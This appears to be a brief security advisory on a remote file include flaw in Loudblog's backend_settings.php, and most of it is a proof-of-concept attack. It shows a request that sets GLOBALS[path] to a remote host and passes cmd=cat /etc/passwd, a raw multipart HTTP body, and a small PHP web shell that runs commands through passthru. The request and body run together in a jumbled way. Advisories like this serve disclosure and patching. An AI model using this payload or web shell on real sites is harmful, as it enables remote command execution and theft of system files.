|
|
Loudblog Backend_settings.PHP Remote File Include Vulnerability
An exploit is not required, although one has been provided in the exploit section. The following proof of concept URI is available: http://www.example.com/loudblog/inc/backend_settings.php?cmd=cat%20/etc/passwd &GLOBALS[path]=http://www.example.com HTTP/1.1\r\n"; Content-Type: multipart/form-data; boundary=---------------------------7d529a1d23092a Host: [target] Content-Length: [data_length] Connection: Close -----------------------------7d529a1d23092a Content-Disposition: form-data; name="language\r\n"; Content-Type: suntzu -----------------------------7d529a1d23092a-- where on http://www.example.com/loudblog/inc/suntzu.php/index.html, you have code like this: <?php echo"Hi Master!";ini_set("max_execution_time",0);passthru($cmd); ?> |
|
Privacy Statement |